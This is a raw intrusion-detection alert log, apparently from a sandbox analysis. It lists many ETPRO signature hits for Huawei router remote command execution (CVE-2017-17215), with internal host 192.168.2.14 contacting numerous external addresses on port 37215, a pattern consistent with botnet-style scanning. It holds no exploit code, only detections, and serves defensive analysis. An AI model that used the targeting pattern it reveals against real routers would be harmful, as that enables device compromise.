                                                    07/10/24-08:26:23.359612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3887037215192.168.2.1445.98.127.104
                                                    07/10/24-08:26:52.085060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4640437215192.168.2.14171.107.144.227
                                                    07/10/24-08:26:29.854453TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4538437215192.168.2.14108.178.90.57
                                                    07/10/24-08:26:31.111831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3710037215192.168.2.14197.214.223.150
                                                    07/10/24-08:27:13.986836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6096837215192.168.2.14157.19.24.48
                                                    07/10/24-08:27:05.150290TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5579237215192.168.2.1441.83.217.214
                                                    07/10/24-08:26:28.757410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3942637215192.168.2.1441.215.129.139
                                                    07/10/24-08:27:19.279611TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5300837215192.168.2.1441.120.225.208
                                                    07/10/24-08:26:11.126416TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5713237215192.168.2.14153.104.213.89
                                                    07/10/24-08:26:17.947291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4391837215192.168.2.14157.36.138.166
                                                    07/10/24-08:26:25.523012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3641037215192.168.2.1479.80.250.47
                                                    07/10/24-08:27:00.476444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5742437215192.168.2.1441.87.55.158
                                                    07/10/24-08:26:18.024076TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3546037215192.168.2.14157.24.130.14
                                                    07/10/24-08:26:17.981356TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4610037215192.168.2.14157.198.134.187
                                                    07/10/24-08:27:22.926905TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6004237215192.168.2.1495.196.242.223
                                                    07/10/24-08:27:28.166168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4793637215192.168.2.14142.196.231.190
                                                    07/10/24-08:26:29.878263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3396237215192.168.2.14197.169.32.121
                                                    07/10/24-08:26:20.185610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4141837215192.168.2.14141.47.29.235
                                                    07/10/24-08:27:33.867801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5274037215192.168.2.1441.216.244.86
                                                    07/10/24-08:26:43.530695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4538837215192.168.2.1441.209.37.45
                                                    07/10/24-08:27:24.896247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3826837215192.168.2.14197.250.17.102
                                                    07/10/24-08:26:53.171855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3811237215192.168.2.14157.245.146.103
                                                    07/10/24-08:26:29.864679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3668237215192.168.2.1441.141.98.200
                                                    07/10/24-08:27:02.899646TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3951637215192.168.2.1414.119.94.70
                                                    07/10/24-08:26:14.817162TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3806837215192.168.2.14157.82.130.195
                                                    07/10/24-08:26:55.332212TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5983837215192.168.2.1489.123.226.177
                                                    07/10/24-08:26:14.784198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5616837215192.168.2.1441.253.206.129
                                                    07/10/24-08:26:25.442977TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5845437215192.168.2.1466.110.90.206
                                                    07/10/24-08:26:55.356991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5751437215192.168.2.14197.109.53.100
                                                    07/10/24-08:26:17.985720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5754237215192.168.2.1443.39.192.117
                                                    07/10/24-08:26:47.804395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4100637215192.168.2.14157.136.231.18
                                                    07/10/24-08:26:48.011006TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3880037215192.168.2.14197.115.225.191
                                                    07/10/24-08:27:17.034911TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5647637215192.168.2.14197.249.158.162
                                                    07/10/24-08:27:27.172380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6072237215192.168.2.14199.227.107.223
                                                    07/10/24-08:26:33.231077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3580637215192.168.2.14157.109.220.40
                                                    07/10/24-08:27:05.112679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3807437215192.168.2.1441.219.98.37
                                                    07/10/24-08:26:20.106591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6068837215192.168.2.14172.89.175.55
                                                    07/10/24-08:26:48.006424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4583037215192.168.2.1441.41.138.236
                                                    07/10/24-08:26:31.081032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3338237215192.168.2.14157.181.173.197
                                                    07/10/24-08:27:22.487648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4046437215192.168.2.14197.71.66.235
                                                    07/10/24-08:27:19.289200TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5665037215192.168.2.14197.109.136.36
                                                    07/10/24-08:27:07.376738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4511437215192.168.2.14197.228.194.191
                                                    07/10/24-08:27:08.334511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3359437215192.168.2.14197.252.49.145
                                                    07/10/24-08:27:28.162880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4544637215192.168.2.14197.40.127.182
                                                    07/10/24-08:26:45.623094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3401437215192.168.2.14157.117.20.233
                                                    07/10/24-08:27:11.503966TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3525037215192.168.2.14197.1.171.40
                                                    07/10/24-08:27:32.576529TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5686037215192.168.2.1480.234.17.179
                                                    07/10/24-08:26:55.365798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3753237215192.168.2.14157.184.178.13
                                                    07/10/24-08:27:02.954734TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3466837215192.168.2.14157.56.233.175
                                                    07/10/24-08:26:38.527687TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5216437215192.168.2.14197.1.12.253
                                                    07/10/24-08:27:30.562058TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4830037215192.168.2.14111.39.144.149
                                                    07/10/24-08:27:28.115702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5446237215192.168.2.1451.245.52.217
                                                    07/10/24-08:27:20.494991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4109237215192.168.2.1441.18.255.134
                                                    07/10/24-08:26:38.613798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5840837215192.168.2.14157.72.178.91
                                                    07/10/24-08:26:38.652813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3956437215192.168.2.14154.190.254.211
                                                    07/10/24-08:26:29.852071TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4668437215192.168.2.14111.177.245.238
                                                    07/10/24-08:26:15.869834TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3521637215192.168.2.14157.172.135.68
                                                    07/10/24-08:26:20.116732TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3853237215192.168.2.1481.55.82.22
                                                    07/10/24-08:27:14.821863TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4954237215192.168.2.1424.19.18.115
                                                    07/10/24-08:26:53.187114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4961637215192.168.2.14157.144.225.210
                                                    07/10/24-08:27:17.074634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4757037215192.168.2.1441.154.152.221
                                                    07/10/24-08:26:57.664786TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5028837215192.168.2.1441.164.56.35
                                                    07/10/24-08:26:38.591498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5858237215192.168.2.14146.150.150.17
                                                    07/10/24-08:26:28.923936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4014437215192.168.2.1441.57.229.57
                                                    07/10/24-08:26:36.397079TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5772437215192.168.2.14100.221.207.105
                                                    07/10/24-08:26:43.833151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4575637215192.168.2.14157.240.223.245
                                                    07/10/24-08:27:31.522185TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5236637215192.168.2.14157.66.110.147
                                                    07/10/24-08:26:14.826871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4724037215192.168.2.14114.50.72.209
                                                    07/10/24-08:26:57.670827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4084237215192.168.2.14197.101.39.248
                                                    07/10/24-08:27:22.802348TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4387637215192.168.2.14157.83.240.248
                                                    07/10/24-08:27:33.882743TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4192037215192.168.2.14157.78.23.199
                                                    07/10/24-08:27:05.083120TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5770837215192.168.2.1441.229.191.79
                                                    07/10/24-08:26:41.507616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3698037215192.168.2.14157.1.76.225
                                                    07/10/24-08:26:15.869789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3655437215192.168.2.1444.156.79.63
                                                    07/10/24-08:27:08.458105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5540637215192.168.2.14197.88.49.31
                                                    07/10/24-08:26:47.857207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4059037215192.168.2.14197.194.165.247
                                                    07/10/24-08:27:22.794160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5461437215192.168.2.14149.149.8.144
                                                    07/10/24-08:27:23.944748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5805037215192.168.2.14133.215.49.34
                                                    07/10/24-08:26:29.784523TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3862837215192.168.2.1472.48.27.147
                                                    07/10/24-08:26:43.815031TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5495837215192.168.2.14157.94.57.205
                                                    07/10/24-08:26:14.823884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4237237215192.168.2.14157.38.113.225
                                                    07/10/24-08:26:34.216677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6022037215192.168.2.14157.72.149.141
                                                    07/10/24-08:26:41.325591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4218437215192.168.2.1434.185.242.6
                                                    07/10/24-08:27:11.518597TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4260837215192.168.2.1441.53.189.202
                                                    07/10/24-08:26:38.599801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3668437215192.168.2.14197.138.69.227
                                                    07/10/24-08:26:59.724469TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5840037215192.168.2.14197.95.161.233
                                                    07/10/24-08:27:19.317652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5503237215192.168.2.14140.64.241.164
                                                    07/10/24-08:26:14.771474TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5852237215192.168.2.14157.212.17.96
                                                    07/10/24-08:26:25.447222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4205637215192.168.2.14157.3.189.124
                                                    07/10/24-08:27:32.600329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3721637215192.168.2.14157.3.185.184
                                                    07/10/24-08:26:22.221406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5531237215192.168.2.1470.11.30.103
                                                    07/10/24-08:26:26.482822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6074437215192.168.2.1441.145.141.8
                                                    07/10/24-08:26:29.847226TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3540037215192.168.2.14157.54.200.84
                                                    07/10/24-08:26:36.392999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5186237215192.168.2.14157.190.112.70
                                                    07/10/24-08:26:42.364468TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5158637215192.168.2.1441.163.62.129
                                                    07/10/24-08:27:22.933807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4614837215192.168.2.1441.28.154.198
                                                    07/10/24-08:26:43.901801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3370037215192.168.2.14197.99.170.169
                                                    07/10/24-08:27:14.821863TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3315237215192.168.2.14197.140.161.75
                                                    07/10/24-08:26:45.619153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5082637215192.168.2.14197.118.6.4
                                                    07/10/24-08:27:22.936367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5684037215192.168.2.1441.6.158.123
                                                    07/10/24-08:26:17.967012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3719637215192.168.2.1441.19.219.16
                                                    07/10/24-08:26:23.320405TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3823237215192.168.2.1441.198.1.16
                                                    07/10/24-08:27:22.870482TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3309237215192.168.2.14157.133.25.85
                                                    07/10/24-08:26:25.497037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4630637215192.168.2.1441.178.220.168
                                                    07/10/24-08:27:07.342046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5086437215192.168.2.1441.187.84.39
                                                    07/10/24-08:27:19.299032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5685437215192.168.2.14135.105.25.169
                                                    07/10/24-08:26:28.830687TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5913037215192.168.2.14157.120.123.96
                                                    07/10/24-08:26:43.574269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4772237215192.168.2.14157.115.204.246
                                                    07/10/24-08:26:43.856431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5039237215192.168.2.14197.141.19.96
                                                    07/10/24-08:26:55.376308TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3485237215192.168.2.14157.94.101.134
                                                    07/10/24-08:27:27.178042TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5405837215192.168.2.14157.18.205.149
                                                    07/10/24-08:27:33.907350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3417637215192.168.2.14157.200.204.223
                                                    07/10/24-08:27:05.111278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5619037215192.168.2.14140.151.227.89
                                                    07/10/24-08:26:22.258130TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3651637215192.168.2.14157.148.19.195
                                                    07/10/24-08:26:59.663550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5119237215192.168.2.14197.40.35.35
                                                    07/10/24-08:27:05.121645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5382237215192.168.2.14197.65.45.206
                                                    07/10/24-08:27:32.556430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5533637215192.168.2.14197.208.158.58
                                                    07/10/24-08:27:13.833154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5239837215192.168.2.1464.78.189.158
                                                    07/10/24-08:26:43.644990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5593037215192.168.2.14130.64.233.147
                                                    07/10/24-08:27:22.929262TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3754037215192.168.2.14187.136.161.30
                                                    07/10/24-08:26:48.012931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3992237215192.168.2.1441.17.12.120
                                                    07/10/24-08:26:52.035645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3398637215192.168.2.14197.86.185.112
                                                    07/10/24-08:26:36.422822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5502837215192.168.2.14141.247.34.58
                                                    07/10/24-08:26:43.655203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5512437215192.168.2.14197.101.32.152
                                                    07/10/24-08:27:08.441013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5162837215192.168.2.14197.241.138.43
                                                    07/10/24-08:27:13.978564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4660237215192.168.2.14157.65.182.150
                                                    07/10/24-08:27:32.545820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4180437215192.168.2.14102.222.107.240
                                                    07/10/24-08:26:34.249351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3831837215192.168.2.14124.39.38.227
                                                    07/10/24-08:26:57.583179TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3647237215192.168.2.1480.214.208.207
                                                    07/10/24-08:26:28.906271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5045837215192.168.2.14197.147.246.211
                                                    07/10/24-08:27:07.369719TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5887237215192.168.2.14197.50.227.46
                                                    07/10/24-08:26:20.186455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5770037215192.168.2.1441.151.231.252
                                                    07/10/24-08:26:15.879292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5551637215192.168.2.1441.136.151.121
                                                    07/10/24-08:26:17.971584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5753237215192.168.2.1441.29.10.3
                                                    07/10/24-08:26:49.768193TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3936437215192.168.2.14111.159.108.143
                                                    07/10/24-08:27:19.299032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5519037215192.168.2.1441.55.234.104
                                                    07/10/24-08:26:34.202550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5787637215192.168.2.1413.67.44.3
                                                    07/10/24-08:26:17.971470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5995637215192.168.2.1472.39.101.15
                                                    07/10/24-08:27:11.514897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4565637215192.168.2.1441.187.235.88
                                                    07/10/24-08:27:10.751291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5811237215192.168.2.14197.145.17.136
                                                    07/10/24-08:26:49.866134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3951437215192.168.2.14157.151.103.10
                                                    07/10/24-08:26:57.641843TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5502837215192.168.2.1476.27.29.133
                                                    07/10/24-08:27:13.803034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3673237215192.168.2.14157.119.58.117
                                                    07/10/24-08:26:42.164122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4629637215192.168.2.14157.128.237.232
                                                    07/10/24-08:27:24.957397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5556637215192.168.2.14197.159.211.133
                                                    07/10/24-08:26:28.824956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4088637215192.168.2.14179.71.144.235
                                                    07/10/24-08:26:36.422103TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3475437215192.168.2.14197.157.10.90
                                                    07/10/24-08:26:41.523308TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4538837215192.168.2.14197.235.103.149
                                                    07/10/24-08:26:52.085060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3369237215192.168.2.1441.2.155.142
                                                    07/10/24-08:27:30.541025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4516837215192.168.2.1491.130.171.206
                                                    07/10/24-08:27:02.759865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3586837215192.168.2.14197.166.186.38
                                                    07/10/24-08:27:24.894621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5222237215192.168.2.14197.93.193.0
                                                    07/10/24-08:26:42.364562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3705237215192.168.2.1441.217.126.71
                                                    07/10/24-08:26:28.783011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4510637215192.168.2.14157.226.40.136
                                                    07/10/24-08:27:27.147329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4333437215192.168.2.1437.158.197.242
                                                    07/10/24-08:26:42.363938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5171237215192.168.2.1441.73.218.6
                                                    07/10/24-08:26:55.386959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5362037215192.168.2.14157.52.112.43
                                                    07/10/24-08:26:57.576804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4582637215192.168.2.14197.91.134.174
                                                    07/10/24-08:26:55.440682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5347037215192.168.2.1441.175.25.63
                                                    07/10/24-08:26:25.420167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5377837215192.168.2.14197.21.77.124
                                                    07/10/24-08:27:08.350346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5206237215192.168.2.14157.153.182.175
                                                    07/10/24-08:26:41.435544TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3804837215192.168.2.14197.145.212.201
                                                    07/10/24-08:26:20.122842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3396237215192.168.2.14171.20.195.9
                                                    07/10/24-08:27:22.492179TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4736037215192.168.2.14197.165.222.181
                                                    07/10/24-08:27:07.376255TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4537037215192.168.2.14157.227.101.14
                                                    07/10/24-08:27:33.734254TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5257837215192.168.2.1466.4.133.15
                                                    07/10/24-08:26:55.421608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4932437215192.168.2.14157.193.31.135
                                                    07/10/24-08:26:53.165242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4535637215192.168.2.14197.226.249.55
                                                    07/10/24-08:26:49.813021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5931637215192.168.2.14182.133.217.207
                                                    07/10/24-08:26:49.900161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4747437215192.168.2.14197.130.220.214
                                                    07/10/24-08:26:38.512743TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3825637215192.168.2.1441.31.242.168
                                                    07/10/24-08:26:28.855166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3576837215192.168.2.1441.154.38.47
                                                    07/10/24-08:27:24.932186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4186637215192.168.2.1441.124.157.82
                                                    07/10/24-08:26:29.810736TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4808837215192.168.2.14157.190.163.13
                                                    07/10/24-08:26:45.594694TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3796237215192.168.2.14197.239.237.112
                                                    07/10/24-08:27:02.823206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4259037215192.168.2.14197.70.68.139
                                                    07/10/24-08:27:07.384932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4932237215192.168.2.14157.31.253.248
                                                    07/10/24-08:27:22.800658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4525637215192.168.2.14157.173.182.232
                                                    07/10/24-08:27:32.476844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5978837215192.168.2.1441.145.11.22
                                                    07/10/24-08:27:02.823604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4430437215192.168.2.1441.161.241.236
                                                    07/10/24-08:26:20.159538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5826837215192.168.2.1441.48.241.124
                                                    07/10/24-08:27:30.538124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5177637215192.168.2.1441.52.136.73
                                                    07/10/24-08:26:52.070871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4355837215192.168.2.14157.82.224.44
                                                    07/10/24-08:26:41.375849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3512837215192.168.2.14131.139.230.173
                                                    07/10/24-08:27:03.000854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5337237215192.168.2.14197.43.121.184
                                                    07/10/24-08:26:41.360429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4773437215192.168.2.14208.107.225.67
